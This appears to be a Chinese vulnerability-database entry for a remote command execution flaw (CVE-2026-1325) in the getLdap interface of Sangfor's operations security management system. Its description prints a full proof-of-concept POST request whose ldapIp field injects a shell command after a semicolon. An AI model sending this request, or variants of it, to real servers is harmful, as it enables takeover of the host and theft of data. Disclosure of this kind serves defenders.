返回列表

深信服运维安全管理系统 /fort/user;help/getLdap 代码执行漏洞

CVE: CVE-2026-1325

CNVD: 暂无

CNNVD: 暂无

漏洞类型: 暂无

漏洞等级: 暂无

年份: 2026

POC_ID: 94510

漏洞描述

该漏洞是运维安全管理系统 getLdap 接口存在远程命令执行漏洞，攻击者可通过构造恶意请求，在目标服务器上执行任意命令，导致服务器被控制和敏感数据泄露，危害极大。 POST /fort/user;help/getLdap HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 29 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip Connection: close ldapIp=;echo 72D27b0f1cFFDA5f

影响范围

深信服运维安全管理系统

漏洞详情

登录后可查看漏洞详情。请先登录或注册。

漏洞 POC

登录后可查看漏洞 POC。请先登录或注册。

修复建议

暂无

参考来源

https://rss.biu.life/ti/%E6%B7%B1%E4%BF%A1%E6%9C%8D%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20/fort/user%3Bhelp/getLdap%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E